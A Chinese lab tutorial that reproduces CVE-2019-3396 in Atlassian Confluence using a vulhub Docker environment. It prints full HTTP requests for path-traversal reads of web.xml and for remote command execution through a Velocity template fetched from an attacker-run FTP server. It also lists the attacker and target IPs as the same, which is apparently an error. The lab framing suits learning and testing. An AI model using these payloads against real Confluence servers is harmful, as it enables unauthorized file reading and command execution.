完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

2023-10-19 17:10
文章标签 流程 路径 命令 漏洞 执行 2019 复现 cve 完整 confluence 穿越 atlassian 3396

本文主要是介绍完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

搭建环境之前,最好将虚拟机的内存调至4G

靶机ip:192.168.187.130,os:centos7

攻击主机:ip:192.168.187.130, os:kali2019,工具:burpsuite

 

(一)安装pip,docker环境

由于docker-compose需要pip来安装,首先要安装pip环境

 

1.安装docker

用root账户登陆linux,我这里用的centos7,其他的linux系统也可以

然后执行

curl -s https://get.docker.com/ | sh

然后执行docker -v查看docker是否安装成功

 

2.安装pip

curl -s https://bootstrap.pypa.io/get-pip.py|python

可以看到成功安装了两个工具,这里再检查一下有没有安装setuptools工具

执行pip install setuptools

检查pip版本pip -V

 

3. pip安装docker-compose

这里可能会遇到很多报错,参考https://www.cnblogs.com/felixqiang/p/11946644.html解决

当出现这个时,意味着docker-compose成功安装

docker-compose -v查看版本号

 

4.克隆vulhub的github库

yum install git,首先安装git

git clone https://github.com/vulhub/vulhub,克隆vulhub库,可以下载可能会比较慢

到这里结束建议保存快照,每次做完一个漏洞复现就可以恢复快照从而恢复环境

或者输入docker-compose down移除环境

 

(二)启动环境

1.启动docker环境

cd vulhub/confluence/CVE-2019-3396/,进入CVE-2019-3396目录

systemctl start docker,启动docker

systemctl status docker,检查docker是否在运行

docker-compose build && docker-compose up -d,启动漏洞环境

这里搭建时间会很久,可以搞一个加速器

sudo vi /etc/docker/daemon.json

请在该配置文件中加入(没有该文件的话,请先建一个):

{"registry-mirrors": ["http://hub-mirror.c.163.com"]
}

出现这个说明启动成功了

再看一下8090端口是否启动

 

2.启动Confluence环境

在当前linux系统访问http://localhost:8090/,选择Trial Installation

这里会要求填写license key,先不要着急,点击Get an evaluation license,获取一个临时证书

之后他会让你注册一个账户,按要求注册即可,不需要个人信息,也不需要花钱,注册好后登陆

会来的申请证书的界面,按图示操作即可(不要选择Data Center和Addons)

然后进入License,选择一个证书

复制License Key

粘贴到之前这个页面的Confluence框,如果找不到这个页面就在地址栏输入localhost:8090

然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。这里千万不要中断。

如果提示填写cluster node,路径填写/home/confluence即可。

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db,账号密码均为postgres

 至此靶机环境已经搭建完成

 

(四)漏洞复现

Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。

我在kali上打开burpsuite,选择Repeater,输入如下文本,把localhost替换成靶机的ip地址,如果攻击主机和靶机是同一台机器则不用

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

点击GO执行,拿到账户文件

抓取web.xml,将localhost替换为靶机ip,如果攻击主机和靶机是同一台机器则不用,burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 172{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

 拿到web.xml

 

6.12以前的Confluence没有限制文件读取的协议和路径,我们可以使用file:///etc/passwd来读取文件,也可以通过https://...来加载远程文件(在攻击主机上完成该步骤)

git clone https://github.com/Yt1g3r/CVE-2019-3396_EXP.git    //先下载EXP

然后用python搭建一个临时的ftp服务器

pip install pyftpdlib

cd CVE-2019-3396_EXP     //进入这个目录

python -m pyftpdlib -p 21    //启动FTP服务

将localhost替换为靶机ip,ip:port替换为攻击主机ip和21端口如果攻击主机和靶机是同一台机器则不用,在burpsuite输入如下文本

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 198{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"ftp://ip:port/cmd.vm","cmd":"id"}}}

拿到uid

至此,漏洞复现完成。

 

可以参考Vulhub官方的复现教程

https://vulhub.org/#/environments/confluence/CVE-2019-3396/

参考文献:https://blog.csdn.net/jiangbuliu/article/details/94016753

                  http://www.ywnxs.com/1461.html

 

这篇关于完整复现流程-Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/241200

相关文章

使用Java发送邮件到QQ邮箱的完整指南

使用Java发送邮件到QQ邮箱的完整指南

《使用Java发送邮件到QQ邮箱的完整指南》在现代软件开发中,邮件发送功能是一个常见的需求,无论是用户注册验证、密码重置,还是系统通知,邮件都是一种重要的通信方式,本文将详细介绍如何使用Java编写程... 目录引言1. 准备工作1.1 获取QQ邮箱的SMTP授权码1.2 添加JavaMail依赖2. 实现
阅读更多...
IDEA与JDK、Maven安装配置完整步骤解析

IDEA与JDK、Maven安装配置完整步骤解析

《IDEA与JDK、Maven安装配置完整步骤解析》:本文主要介绍如何安装和配置IDE(IntelliJIDEA),包括IDE的安装步骤、JDK的下载与配置、Maven的安装与配置,以及如何在I... 目录1. IDE安装步骤2.配置操作步骤3. JDK配置下载JDK配置JDK环境变量4. Maven配置下
阅读更多...
linux环境openssl、openssh升级流程

linux环境openssl、openssh升级流程

《linux环境openssl、openssh升级流程》该文章详细介绍了在Ubuntu22.04系统上升级OpenSSL和OpenSSH的方法,首先,升级OpenSSL的步骤包括下载最新版本、安装编译... 目录一.升级openssl1.官网下载最新版openssl2.安装编译环境3.下载后解压安装4.备份
阅读更多...
Vue中动态权限到按钮的完整实现方案详解

Vue中动态权限到按钮的完整实现方案详解

《Vue中动态权限到按钮的完整实现方案详解》这篇文章主要为大家详细介绍了Vue如何在现有方案的基础上加入对路由的增、删、改、查权限控制,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、数据库设计扩展1.1 修改路由表(routes)1.2 修改角色与路由权限表(role_routes)二、后端接口设计
阅读更多...
C#集成DeepSeek模型实现AI私有化的流程步骤(本地部署与API调用教程)

C#集成DeepSeek模型实现AI私有化的流程步骤(本地部署与API调用教程)

《C#集成DeepSeek模型实现AI私有化的流程步骤(本地部署与API调用教程)》本文主要介绍了C#集成DeepSeek模型实现AI私有化的方法,包括搭建基础环境,如安装Ollama和下载DeepS... 目录前言搭建基础环境1、安装 Ollama2、下载 DeepSeek R1 模型客户端 ChatBo
阅读更多...
grom设置全局日志实现执行并打印sql语句

grom设置全局日志实现执行并打印sql语句

《grom设置全局日志实现执行并打印sql语句》本文主要介绍了grom设置全局日志实现执行并打印sql语句,包括设置日志级别、实现自定义Logger接口以及如何使用GORM的默认logger,通过这些... 目录gorm中的自定义日志gorm中日志的其他操作日志级别Debug自定义 Loggergorm中的
阅读更多...
linux打包解压命令方式

linux打包解压命令方式

《linux打包解压命令方式》文章介绍了Linux系统中常用的打包和解压命令,包括tar和zip,使用tar命令可以创建和解压tar格式的归档文件,使用zip命令可以创建和解压zip格式的压缩文件,每... 目录Lijavascriptnux 打包和解压命令打包命令解压命令总结linux 打包和解压命令打
阅读更多...
MySQL9.0默认路径安装下重置root密码

MySQL9.0默认路径安装下重置root密码

《MySQL9.0默认路径安装下重置root密码》本文主要介绍了MySQL9.0默认路径安装下重置root密码,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们... 目录问题描述环境描述解决方法正常模式下修改密码报错原因问题描述mysqlChina编程采用默认安装路径,
阅读更多...
SpringBoot中整合RabbitMQ(测试+部署上线最新完整)的过程

SpringBoot中整合RabbitMQ(测试+部署上线最新完整)的过程

《SpringBoot中整合RabbitMQ(测试+部署上线最新完整)的过程》本文详细介绍了如何在虚拟机和宝塔面板中安装RabbitMQ,并使用Java代码实现消息的发送和接收,通过异步通讯,可以优化... 目录一、RabbitMQ安装二、启动RabbitMQ三、javascript编写Java代码1、引入
阅读更多...
JavaScript中的reduce方法执行过程、使用场景及进阶用法

JavaScript中的reduce方法执行过程、使用场景及进阶用法

《JavaScript中的reduce方法执行过程、使用场景及进阶用法》:本文主要介绍JavaScript中的reduce方法执行过程、使用场景及进阶用法的相关资料,reduce是JavaScri... 目录1. 什么是reduce2. reduce语法2.1 语法2.2 参数说明3. reduce执行过程
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2